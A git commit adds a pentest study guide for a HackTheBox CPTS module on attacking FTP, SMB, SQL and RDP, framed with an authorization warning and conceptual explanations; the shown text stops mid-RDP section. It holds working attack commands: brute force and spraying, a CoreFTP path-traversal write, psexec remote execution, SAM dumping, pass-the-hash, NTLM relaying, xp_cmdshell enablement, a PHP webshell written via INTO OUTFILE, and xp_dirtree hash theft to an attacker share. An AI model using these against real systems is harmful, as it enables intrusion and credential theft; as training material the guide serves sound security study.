commit 644453394b6a963663c140e879bc5598b8aaa556
parent 99e629a6f82e4c3390d905253838724891485505
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date: Wed, 16 Sep 2026 23:09:35 +0100
feat: add detailed Attacking Common Services guide (CPTS module 11)
Long-form companion to the Attacking Common Services cheat sheet, mirroring
the module 24 applications guide: section-by-section walkthrough of FTP, SMB,
SQL (MySQL/MSSQL), RDP, DNS, and email, framed by the Source -> Process ->
Privileges -> Destination model, with native flow charts and NetExec-current
tooling. Cross-linked from the services cheat sheet and workflow dashboard.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Diffstat:
3 files changed, 682 insertions(+), 3 deletions(-)
diff --git a/src/content/sheets/pentest-workflow/attacking-common-modules-dashboard.md b/src/content/sheets/pentest-workflow/attacking-common-modules-dashboard.md
@@ -86,7 +86,7 @@ printf '%s\t%s\n' "$IP" "$TARGET" | sudo tee -a /etc/hosts
| # | Cheat Sheet | Covers |
|---:|---|---|
-| 01 | [Attacking Common Services](/sheets/pentest-workflow/attacking-common-services) · [Full field manual](/sheets/pentest-workflow/network-service-attack-manual) | One-stop attack surface card plus a long-form workflow for FTP · SMB · SQL (MySQL/MSSQL) · RDP · DNS · Email (SMTP/POP3/IMAP), evidence, cleanup, failure analysis, and multi-service chains |
+| 01 | [Attacking Common Services](/sheets/pentest-workflow/attacking-common-services) · [Full walkthrough guide](/sheets/pentest-workflow/attacking-common-services-guide) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) | One-stop attack surface card, a section-by-section module walkthrough, plus a long-form field manual for FTP · SMB · SQL (MySQL/MSSQL) · RDP · DNS · Email (SMTP/POP3/IMAP), evidence, cleanup, failure analysis, and multi-service chains |
| 02 | [Attacking Common Applications](/sheets/pentest-workflow/attacking-common-applications) | Fingerprint-to-foothold chains for WordPress · Joomla · Drupal · Tomcat · Jenkins · Splunk · PRTG · osTicket · GitLab · CGI/Shellshock · ColdFusion · IIS Tilde · LDAP/Mass-Assignment |
| 03 | [Linux Privilege Escalation](/sheets/pentest-workflow/linux-privesc-cpts) | Linux root paths: enumeration · cron/systemd/PATH · credentials · sudo · containers/Kubernetes · kernel/SUID/capabilities · NFS/tmux/logrotate |
| 04 | [Windows Privilege Escalation](/sheets/pentest-workflow/windows-privesc-cpts) | Windows SYSTEM/admin paths: token and group abuse · UAC · services/registry · scheduled tasks/autoruns · kernel/DLL · credentials · LOLBAS |
diff --git a/src/content/sheets/pentest-workflow/attacking-common-services-guide.md b/src/content/sheets/pentest-workflow/attacking-common-services-guide.md
@@ -0,0 +1,679 @@
+---
+title: "Attacking Common Services — Full Guide"
+description: "Detailed CPTS walkthrough for enumerating and exploiting the network services that dominate internal and perimeter networks: FTP, SMB, SQL (MySQL/MSSQL), RDP, DNS, and email (SMTP/POP3/IMAP) — anonymous access, default creds, spraying, misconfigurations, and the module's worked CVEs, framed by the Source → Process → Privileges → Destination model."
+category: pentest-workflow
+subcategory: "Companion Guides"
+order: 24
+tags: ["htb", "cpts", "attacking-common", "services", "ftp", "smb", "mssql", "mysql", "rdp", "dns", "smtp", "pop3", "imap", "responder", "pass-the-hash", "subdomain-takeover", "pentest-workflow"]
+tools: ["nmap", "smbclient / smbmap / rpcclient / enum4linux-ng", "netexec (nxc) / crackmapexec", "impacket (psexec/smbexec/atexec/ntlmrelayx/mssqlclient/smbserver)", "responder", "hashcat", "medusa / hydra / crowbar", "mysql / sqsh / sqlcmd", "xfreerdp / rdesktop", "dig / fierce / subfinder", "swaks / smtp-user-enum / o365spray", "ettercap / bettercap"]
+difficulty: intermediate
+updated: "2026-09-16"
+source: "vault:HackTheBox/Academy/CPTS Path/11-Attacking-Common-Services"
+---
+
+[← Condensed cheat sheet](/sheets/pentest-workflow/attacking-common-services) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Applications guide →](/sheets/pentest-workflow/attacking-common-applications-guide)
+
+# Attacking Common Services — Full Guide `fas:ClipboardList`
+
+> [!dashboard] What this is
+> The long-form companion to the [Attacking Common Services cheat sheet](/sheets/pentest-workflow/attacking-common-services). The cheat sheet is the card you keep open during a box; this guide is the walkthrough that explains *why* each step works, section by section, across the whole CPTS module. Reach for the cheat sheet mid-engagement and this guide when you're learning the material or writing it up. For the broader cross-module field reference (NFS, Kerberos, WinRM, SNMP, SSH, chaining, cleanup) see the [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual).
+
+Common services are the plumbing every network runs on: a file share, a database, a mail server, a remote-desktop endpoint, a DNS resolver. They are rarely glamorous and almost never the thing a defender hardens first, which is exactly why they land footholds. A company patches its browsers and hardens its domain controllers, then leaves an FTP root that accepts `anonymous`, an MSSQL instance still running `xp_cmdshell` as a service account, or an SMB server that answers a null session and hands over its share list for free.
+
+Every service in this module answers to the same loop. Learn the loop rather than memorising six unrelated exploits:
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">Common-services attack loop</span><span class="flow__dir">TD</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="td">
+ <div class="flow-rank"><div class="flow-node is-entry">Enumerate the service<span class="sub">nmap -sC -sV · banner · version</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Try anonymous / null access<span class="sub">(free, non-destructive, first)</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Default → weak credentials<span class="sub">admin:admin · root:<blank> · service defaults</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Reuse everything found<span class="sub">a filename, a mailbox string, a config value</span><span class="sub">as a candidate cred on every other service</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Spray (lockout-aware)<span class="sub">one password, many users, spaced</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-decision">Turn access into code or creds</div></div>
+ <div class="flow-branches">
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">built-in feature</span></div><div class="flow-node">xp_cmdshell · WAR/webshell upload<span class="sub">SELECT ... INTO OUTFILE · tscon</span></div></div>
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">version CVE</span></div><div class="flow-node">CoreFTP · SMBGhost · BlueKeep<span class="sub">OpenSMTPD · Drupalgeddon-class</span></div></div>
+ </div>
+ <div class="flow-join"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">Loot → feed credential hunting<span class="sub">and lateral movement</span></div></div>
+ </div>
+ </div>
+</figure>
+
+> [!danger]+ Authorized targets only
+> `fas:TriangleExclamation`
+> Everything here affects availability and integrity of real services. **Password spraying** can lock accounts, **NTLM relaying** authenticates as a real user, and the RCE CVEs are the sharp end — **BlueKeep can BSOD the host** and OpenSMTPD RCE runs as root. Run this only on engagements or labs where you hold explicit written permission, spray with the lockout policy in front of you, get sign-off before firing a memory-corruption exploit at anything a client cares about, and treat every recovered credential as sensitive evidence rather than something to paste into permanent notes.
+
+---
+
+## 1 · Interacting with common services `fas:Terminal`
+
+Before attacking a service you have to be fluent in using it normally, from both a Windows and a Linux vantage point. Most "attacks" in this module are abuse of the same legitimate interaction patterns shown here — recognising the normal shape of SMB, SQL, and mail traffic is what lets you spot the abnormal (and therefore interesting) later.
+
+> [!tip] Two shells on Windows
+> `cmd.exe` runs native Windows commands only. PowerShell runs those *and* cmdlets, and gives you a real scripting language (`Get-ChildItem`, `Select-String`, `New-PSDrive`, `PSCredential` objects). Default to PowerShell for anything past a one-off `dir`.
+
+**SMB from Windows.** Browse over a UNC path with no mapping, or map a drive with explicit creds and then treat it like local storage:
+
+```cmd
+C:\htb> dir \\192.168.220.129\Finance\
+C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
+C:\htb> dir n: /a-d /s /b | find /c ":\" :: count files — gauge share size before searching
+C:\htb> dir n:\*cred* /s /b :: filename search
+C:\htb> findstr /s /i cred n:\*.* :: content search — leaks different things
+```
+
+**SMB from PowerShell.** Same idea, but composes into the pipeline. Build a `PSCredential` for non-interactive auth:
+
+```powershell
+PS C:\htb> $password = ConvertTo-SecureString 'Password123' -AsPlainText -Force
+PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential 'plaintext', $password
+PS C:\htb> New-PSDrive -Name N -Root "\\192.168.220.129\Finance" -PSProvider FileSystem -Credential $cred
+PS N:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List # PowerShell's grep
+```
+
+**SMB from Linux.** Mount it and it's just a directory — no SMB-specific tooling needed afterwards. Prefer a credentials file so the password stays out of shell history and `ps`:
+
+```bash
+sudo apt install cifs-utils
+sudo mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/creds
+# creds file: username=plaintext / password=Password123 / domain=.
+grep -rn /mnt/Finance/ -ie cred
+```
+
+**SQL clients.** Native CLIs plus one GUI worth keeping installed:
+
+```bash
+sqsh -S 10.129.20.13 -U username -P Password123 # MSSQL from Linux (plaintext SQL auth only)
+mysql -u username -pPassword123 -h 10.129.20.13 # MySQL from Linux
+mssqlclient.py -p 1433 julio@10.129.203.7 # Impacket — supports NTLM hash / Kerberos
+dbeaver & # free, cross-platform, multi-engine GUI
+```
+
+```cmd
+C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123 :: MSSQL from Windows
+```
+
+> [!info] Command breakdown
+> - `sqsh`/`sqlcmd` are the native MSSQL CLIs; `mysql` is MySQL's. `mssqlclient.py` (Impacket) is the one to reach for when you hold an NTLM **hash** rather than a plaintext password — `sqsh`/`sqlcmd` can't do hash or Kerberos auth.
+> - `dbeaver` speaks MySQL, MSSQL, PostgreSQL and more from one UI — the practical cross-platform substitute for SSMS (Windows-only) or MySQL Workbench.
+
+**Mail clients.** Once you hold valid mailbox creds, a real client beats raw protocol commands for reading a mailbox:
+
+```bash
+sudo apt-get install evolution
+export WEBKIT_FORCE_SANDBOX=0 && evolution # if it dies with a bwrap sandbox error
+```
+
+> [!tip] Current tooling
+> For SMB enumeration prefer **`enum4linux-ng`** (maintained Python rewrite) over the effectively-unmaintained Perl `enum4linux`. Impacket is under active Fortra maintenance and is the de-facto standard for scripted SMB/MSSQL interaction.
+
+---
+
+## 2 · The concept of attacks `ris:FileList`
+
+Rather than memorising per-protocol exploits in isolation, decompose any vulnerability into four categories. The same cycle reappears for CoreFTP, SMBGhost, BlueKeep, subdomain takeover, and the OpenSMTPD RCE — once you can place a technique in this frame, spotting the analogue on a service you've never touched gets much faster.
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">Source → Process → Privileges → Destination</span><span class="flow__dir">LR</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="lr">
+ <div class="flow-rank"><div class="flow-node is-entry">Source<span class="sub">code · libraries · config</span><span class="sub">APIs · user input</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Process<span class="sub">the logic handling it</span><span class="sub">— most vulns live here</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Privileges<span class="sub">SYSTEM/root · service acct · role</span><span class="sub">= blast radius</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">Destination<span class="sub">local (file/service)</span><span class="sub">or network (another host)</span></div></div>
+ </div>
+ </div>
+</figure>
+
+> [!info] The four categories
+> - **Source** — where the triggering input originates: already-executed code, a library, static config, an API, or direct user input. Protocol is irrelevant here; an HTTP header injection and a buffer overflow both reduce to "code" as the source.
+> - **Process** — how program logic handles that input. Most real vulnerabilities live here, because it's where a developer's assumptions about input turn out to be wrong.
+> - **Privileges** — the rights the process runs with. This sets the blast radius, not the exploitability: a simple bug in a process running as SYSTEM/root is disproportionately dangerous.
+> - **Destination** — where the result lands: a local file/service, or another host over the network. The cycle is deliberately linear; a full chain is usually an *initiation* cycle (get a foothold / leak something) plus a *trigger* cycle (turn it into RCE).
+
+**Worked example — Log4j (CVE-2021-44228).** A crafted JNDI string in the HTTP `User-Agent` header (Source) is misparsed by the logging function instead of being logged as text (Process); logging typically runs with elevated rights (Privileges); the JNDI lookup reaches out to attacker infrastructure hosting a malicious Java class (Destination). A second cycle then pulls that class back (Source), executes it (Process), inherits the same rights (Privileges), and opens a shell back to the attacker (Destination). Two four-step cycles chained — initiation, then trigger — which is the shape of nearly every exploit chain later in this module.
+
+---
+
+## 3 · Service misconfigurations `fas:Terminal`
+
+Misconfigurations, not zero-days, are the everyday bread and butter of internal tests. Four categories recur across almost every service here:
+
+1. **Weak / default authentication** — `admin:admin`, `admin:password`, blank passwords left after install, or a weak password set "to change later."
+2. **Anonymous authentication** — access with no credentials at all. Common on FTP and SMB, occasionally on SQL.
+3. **Misconfigured access rights** — accounts with permissions beyond their role (an upload-only FTP account that can also read every document). Subtle, because the credentials are "correct" but the account is over-privileged.
+4. **Unnecessary defaults** — sample files, admin/debug interfaces, verbose errors left enabled because they ship on by default.
+
+> [!tip] The order to test in
+> After a banner grab, check **default credentials before anything sophisticated** — cheap to try, disproportionately effective. If defaults fail, run the common weak combos (`admin:<blank>`, `root:12345678`, `administrator:Password`) before you reach for a full spray, and a spray before brute force.
+
+OWASP's **A05:2021 – Security Misconfiguration** doubles as an offensive checklist and ready-made remediation language for the report: disable unneeded admin interfaces, turn off debug/stack traces in production, change default creds immediately, block directory listing and info disclosure, scan on a schedule, automate identical hardening across environments (different creds per environment), and strip unused features/sample apps.
+
+---
+
+## 4 · Finding sensitive information `ris:FileList`
+
+Attacking common services is detective work: a single, apparently insignificant thing found on one service is frequently the key to a completely different one. The canonical worked chain from the module makes the point — an *empty file* is the whole foothold:
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">One empty filename → RCE on a different box</span><span class="flow__dir">LR</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="lr">
+ <div class="flow-rank"><div class="flow-node is-entry">Anonymous FTP<span class="sub">finds empty file 'johnsmith'</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">johnsmith:johnsmith<span class="sub">on FTP → fails</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Same creds on email<span class="sub">→ succeeds</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node">Search mailbox for 'password'<span class="sub">→ finds MSSQL creds</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">MSSQL → xp_cmdshell<span class="sub">→ RCE on the DB server</span></div></div>
+ </div>
+ </div>
+</figure>
+
+The operationally useful takeaway is the *sequencing*: try anonymous access broadly across every discovered service first (cheap, fast, non-destructive), then use anything found — even an empty file's name — as a candidate username or password against every other service, before falling back to brute force or exploitation. Searching any mailbox you get into for the literal string `password` is a surprisingly high-yield move. Tag credential candidates somewhere you can cross-reference them (Obsidian, Ghostwriter, Dradis) so a pivot doesn't get lost in terminal scrollback.
+
+---
+
+## 5 · Attacking FTP `fas:Terminal` — TCP/21
+
+FTP is a plaintext file-transfer protocol. Two misconfigurations dominate (anonymous auth, over-permissive access rights), and a modern CVE shows even a maintained product can carry a trivial arbitrary-write bug.
+
+**Enumerate.** `-sC` runs `ftp-anon`, which both tests anonymous login and lists directory contents inline:
+
+```bash
+sudo nmap -sC -sV -p 21 192.168.2.142
+# | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+# | drwxr-srwt 2 1170 924 2048 Jul 19 18:48 incoming [NSE: writeable]
+# 221/tcp banner e.g. vsFTPd 2.3.4 → note the exact version for CVE lookup
+```
+
+The `[NSE: writeable]` tag flags a directory the anonymous session can write to — a direct route to webshell upload if that same FTP root is served over HTTP elsewhere on the host.
+
+**Anonymous login and file ops.** Try `anonymous` with a blank/arbitrary password even without a prior `ftp-anon` hit — the script occasionally misses custom configs:
+
+```bash
+ftp 192.168.2.142 # Name: anonymous · Password: <blank>
+ftp> ls # navigate like Linux: ls / cd
+ftp> get flag.txt # get/mget download · put/mput upload · help lists client commands
+```
+
+**Brute force / spray.** `-u` a single known user, `-U` a list; spraying (one password, many users) is the safer default where lockout thresholds are unknown:
+
+```bash
+medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
+# ACCOUNT FOUND: [ftp] User: fiona Password: family [SUCCESS]
+hydra -L users.txt -P rockyou.txt ftp://10.129.203.7 # often faster (better connection reuse)
+```
+
+**FTP bounce.** The `PORT` command can make an internet-facing FTP server proxy a scan to a third, internal host you can't reach directly — turning it into a blind port scanner. Modern daemons block this by default, so a positive result is itself a reportable misconfiguration:
+
+```bash
+nmap -Pn -v -n -p80 -b anonymous:password@172.17.0.2 172.17.0.2
+# Login credentials accepted by FTP server! → 80/tcp open http (scanned via the proxy)
+```
+
+**CoreFTP arbitrary file write (CVE-2022-22836).** The HTTP `PUT` handler fails to normalise `../`, so an authenticated `curl` writes a file anywhere the service account can:
+
+```bash
+curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> \
+ --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
+# C:\> type C:\whoops → PoC.
+```
+
+Mapped to the model: user-controlled path + escape chars (Source) → the traversal check validated only the *starting* directory, not the resolved path (Process/Privileges) → arbitrary file on disk (Destination). `--path-as-is` stops curl from collapsing the `../` before it's sent.
+
+---
+
+## 6 · Attacking SMB `fas:Terminal` — TCP/445, 139
+
+SMB (Server Message Block) is the largest attack surface in the module: file/printer/named-pipe sharing over TCP/445 (or 139 with legacy NetBIOS), with Samba as the Linux implementation. The path runs from unauthenticated enumeration all the way to a SYSTEM shell.
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">SMB: null session to SYSTEM</span><span class="flow__dir">TD</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="td">
+ <div class="flow-rank"><div class="flow-node is-entry">nmap -p139,445 -sC -sV<span class="sub">check smb2-security-mode (signing)</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-decision">Null session allowed?</div></div>
+ <div class="flow-branches">
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">yes</span></div><div class="flow-node">smbclient / smbmap / rpcclient -N<span class="sub">shares · users · groups · policy</span></div></div>
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">no</span></div><div class="flow-node">Password spray<span class="sub">nxc / crackmapexec</span></div></div>
+ </div>
+ <div class="flow-join"></div>
+ <div class="flow-rank"><div class="flow-node">Valid admin-equivalent creds or hash</div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">RCE (psexec/smbexec/atexec) · --sam dump · Pass-the-Hash<span class="sub">→ SYSTEM</span></div></div>
+ </div>
+ </div>
+</figure>
+
+**Enumerate.** `-sV -sC` reveal the implementation, version, NetBIOS name, and — critically — whether message signing is enforced:
+
+```bash
+sudo nmap 10.129.14.128 -sV -sC -p139,445
+# 445/tcp open netbios-ssn Samba smbd 4.6.2 (Samba ⇒ Linux target)
+# smb2-security-mode: Message signing enabled but not required ← relaying is possible
+```
+
+Signing *not required* is a prerequisite for the NTLM relay in step 8 — always note it during initial enumeration.
+
+**Null session share / RPC enumeration.** A null session is an SMB connection with no username or password; if it works, treat it as equivalent to low-priv creds for enumeration:
+
+```bash
+smbclient -N -L //10.129.14.128 # list shares (ADMIN$, C$, custom shares, IPC$)
+smbmap -H 10.129.14.128 # same, but with per-share R/W permission columns
+smbmap -H 10.129.14.128 --download "notes\note.txt" # transfer without an interactive session
+rpcclient -U'%' 10.10.110.17 # null session RPC shell
+rpcclient $> enumdomusers # user:[mhope] rid:[0x641] ...
+./enum4linux-ng.py 10.10.11.45 -A -C # one-pass domain/users/groups/shares/policy
+```
+
+**Spray.** One password across a user list avoids the lockout risk of many-passwords-per-account; `--local-auth` targets non-domain accounts; `(Pwn3d!)` marks confirmed local admin:
+
+```bash
+nxc smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
+# [+] WIN7BOX\jurena:Company01! (Pwn3d!)
+# --continue-on-success keeps going past the first hit
+```
+
+> [!tip] CrackMapExec → NetExec
+> **NetExec (`nxc`)** is the actively developed successor to CrackMapExec — same syntax family, more protocol modules. Every `crackmapexec smb ...` in older writeups maps 1:1 to `nxc smb ...`. Examples below use `nxc`; the classic `crackmapexec` name still works where CME is installed.
+
+**Remote code execution.** With admin-equivalent creds, three Impacket methods, each landing a SYSTEM shell by a different mechanism:
+
+```bash
+impacket-psexec administrator:'Password123!'@10.10.110.17 # uploads a service to ADMIN$, runs via SCM
+# C:\Windows\system32> whoami → nt authority\system
+nxc smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
+```
+
+`impacket-smbexec` avoids RemComSvc and works without a writable share (it stands up a local SMB server for output); `impacket-atexec` runs through Task Scheduler instead of the SCM — useful when service creation is blocked or heavily logged.
+
+**Dump SAM hashes.** Sweep a subnet for who's logged on, then dump the local NTLM hashes:
+
+```bash
+nxc smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users # find where a DA is sitting
+nxc smb 10.10.110.17 -u administrator -p 'Password123!' --sam
+# Administrator:500:aad3b435...:2b576acbe6bcfda7294d6bd18041b8fe:::
+```
+
+**Pass-the-Hash.** Windows challenge-response only needs the hash, never the plaintext — so a dumped or captured NTLM hash is immediately usable for lateral movement. PtH is a property of NTLM auth, not a tool feature; it works identically with Impacket, smbmap, and nxc:
+
+```bash
+nxc smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
+# [+] WIN7BOX\Administrator:2B57... (Pwn3d!)
+```
+
+**Forced authentication + relay (Responder / ntlmrelayx).** Responder answers LLMNR/NBT-NS/mDNS broadcasts (which fire whenever a client mistypes a hostname or DNS fails) *as* the server the victim wanted, capturing a NetNTLMv2 hash. Crack it, or relay it live:
+
+```bash
+sudo responder -I ens33
+# [SMB] NTLMv2-SSP Hash : demouser::WIN7BOX:997b18cc61099ba2:...
+hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt # 5600 = NetNTLMv2
+
+# If cracking fails, relay instead. Turn off Responder's own SMB server first (SMB = Off):
+impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
+# add -c '<cmd>' to run a command on the relay target instead of the default SAM dump
+```
+
+Relaying only works where SMB signing is *not enforced* — the check you made during enumeration. This is the same Source→Process→Privileges→Destination cycle as the SQL `xp_dirtree` hash steal in the next section, just triggered by a broadcast name-resolution mistake instead of a SQL stored procedure.
+
+**SMBGhost (CVE-2020-0796)** — concept only. An integer overflow in SMBv3.1.1 compression negotiation on Windows 10 1903/1909: an oversized compressed message overflows a size-check integer, writing past the buffer and overwriting adjacent instructions, which the attacker shapes to redirect execution. Kernel-level exploit development, outside this module's scope, but a clean example of the model at the memory-corruption layer.
+
+---
+
+## 7 · Attacking SQL databases `fas:Terminal` — MSSQL 1433 · MySQL 3306
+
+Databases store credentials, PII, and business data, and often run with excessive service-account privileges — high value on both counts. MSSQL and MySQL both speak SQL/T-SQL once you're in.
+
+<figure class="flow plate corners">
+ <figcaption class="flow__cap"><span class="flow__kind">SQL access to OS command execution</span><span class="flow__dir">TD</span></figcaption>
+ <div class="flow__body">
+ <div class="flow__diagram" data-dir="td">
+ <div class="flow-rank"><div class="flow-node is-entry">Authenticate<span class="sub">mysql · sqsh · sqlcmd · mssqlclient.py</span></div></div>
+ <div class="flow-edge"></div>
+ <div class="flow-rank"><div class="flow-node is-decision">Privilege held?</div></div>
+ <div class="flow-branches">
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MSSQL sysadmin</span></div><div class="flow-node">xp_cmdshell → RCE</div></div>
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MySQL FILE</span></div><div class="flow-node">SELECT ... INTO OUTFILE → webshell</div></div>
+ <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">IMPERSONATE granted</span></div><div class="flow-node">EXECUTE AS LOGIN='sa'<span class="sub">→ effective sysadmin</span></div></div>
+ </div>
+ <div class="flow-join"></div>
+ <div class="flow-rank"><div class="flow-node is-goal">OS command execution as the SQL service account<span class="sub">or pivot via linked server</span></div></div>
+ </div>
+ </div>
+</figure>
+
+> [!info] MSSQL auth modes
+> **Windows auth** (default) ties SQL Server to Windows/AD — already-authenticated users need no further creds. **Mixed mode** additionally allows SQL-native username/password accounts. Specifying a domain/hostname on connect selects Windows auth; omitting it assumes SQL auth. In `sqsh`, a leading `.\` (`.\\julio`) explicitly forces a *local* SQL account.
+
+**Enumerate.** MSSQL defaults to TCP/1433 (a "hidden" instance can sit on 2433); MySQL to TCP/3306. Nmap's `ms-sql-*` scripts leak version, hostname, and domain with no auth:
+
+```bash
+nmap -Pn -sV -sC -p1433,3306 10.10.10.125
+# 1433/tcp ms-sql-s Microsoft SQL Server 2017 ... DNS_Computer_Name: mssql-test.HTB.LOCAL
+```
+
+**Connect and enumerate data.** Every batch in `sqsh`/`sqlcmd` needs `GO` on its own line:
+
+```sql
+-- MySQL
+SHOW DATABASES; USE htbusers; SHOW TABLES; SELECT * FROM users;
+-- MSSQL (sqsh/sqlcmd)
+SELECT name FROM master.dbo.sysdatabases
+GO
+SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
+GO
+```
+
+Ignore the system DBs when hunting data — MySQL `mysql`/`information_schema`/`performance_schema`/`sys`, MSSQL `master`/`msdb`/`model`/`resource`/`tempdb` — they fingerprint the engine but hold no company data.
+
+**Command execution — xp_cmdshell (MSSQL).** An extended stored procedure that spawns a Windows process as the SQL service account. Disabled by default, re-enabled trivially with sysadmin:
+
+```sql
+xp_cmdshell 'whoami'
+GO
+-- no service\mssql$sqlexpress
+-- if disabled:
+EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
+EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
+GO
+```
+
+It runs **synchronously** — control returns only when the command finishes, worth remembering for long-running payloads. MySQL has no direct equivalent but supports UDFs that can run C/C++; rare in production, worth checking.
+
+**Read / write local files.** Note the asymmetric MSSQL defaults — reads work out of the box, writes need Ole Automation enabled first:
+
+```sql
+-- MySQL (needs FILE priv + empty secure_file_priv; check SHOW VARIABLES LIKE 'secure_file_priv')
+SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
+SELECT LOAD_FILE("/etc/passwd");
+-- MSSQL read (no special config)
+SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS x
+GO
+```
+
+Writing a PHP one-liner straight into the web root turns a file-write primitive into RCE if the box also serves web content.
+
+**Privilege escalation via IMPERSONATE.** A self-contained privesc *inside* SQL Server — worth checking on every MSSQL foothold, even without OS access. Find who you can impersonate, then become them (no password needed):
+
+```sql
+SELECT DISTINCT b.name FROM sys.server_permissions a
+ INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
+ WHERE a.permission_name = 'IMPERSONATE'
+GO -- name: sa
+EXECUTE AS LOGIN = 'sa'
+SELECT SYSTEM_USER
+SELECT IS_SRVROLEMEMBER('sysadmin') -- 1 ⇒ full sysadmin; xp_cmdshell now available
+GO -- REVERT switches back
+```
+
+**Linked-server pivoting.** Pass-through T-SQL to a second SQL instance; if the linked server's stored creds have sysadmin, you own that box too. Double single quotes inside the query to escape:
+
+```sql
+SELECT srvname, isremote FROM sysservers
+GO
+EXECUTE('select @@servername, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
+GO
+```
+
+**Steal the service-account hash (xp_dirtree / xp_subdirs).** These procedures reach a path over SMB — point them at your box and the MSSQL service account authenticates to you:
+
+```bash
+sudo impacket-smbserver share ./ -smb2support # or: sudo responder -I tun0
+```
+```sql
+EXEC master..xp_dirtree '\\10.10.110.17\share\'
+GO
+-- [SMB] NTLMv2-SSP Hash : SRVMSSQL\demouser::WIN7BOX:5e3ab1c4380b94a1:...
+```
+
+`xp_subdirs` sometimes errors with access-denied even though the authentication (and hash capture) still completes — a stored-procedure error is not proof the technique failed. Same forced-auth cycle as SMB Responder, triggered from inside SQL.
+
+---
+
+## 8 · Attacking RDP `fas:Terminal` — TCP/3389
+
+RDP is Microsoft's graphical remote-admin protocol, heavily used by sysadmins and MSPs — a prime target. Account lockout policies apply, so spray, don't brute force.
+
+**Enumerate.** `ms-wbt-server` confirms RDP; `rdp-ntlm-info`/`rdp-enum-encryption` add domain/cipher fingerprinting:
+
+```bash
+nmap -Pn -p3389 --script rdp-ntlm-info 192.168.2.143
+# 3389/tcp open ms-wbt-server
+```
+
+**Spray.** Crowbar is purpose-built for RDP/VNC; Hydra's `rdp` module is flagged experimental upstream — reduce parallelism and add wait time:
+
+```bash
+crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
+# RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123
+hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp -t 1 -W 3
+```
+
+**Log in.** `xfreerdp` is the maintained client of choice (dynamic resolution, clipboard, drive redirection, Pass-the-Hash) over the stagnant `rdesktop`:
+
+```bash
+xfreerdp /v:<target> /u:<user> /p:'<password>' # accept the self-signed cert warning
+```
+
+**Session hijacking (local admin → SYSTEM → hijack).** `tscon.exe` reconnects another user's session by ID with no password — but only from a SYSTEM context. Services run as `Local System`, so create one whose binpath is the `tscon` call:
+
+```cmd
+C:\htb> query user
+# juurena rdp-tcp#13 1 Active · lewen rdp-tcp#14 2 Active
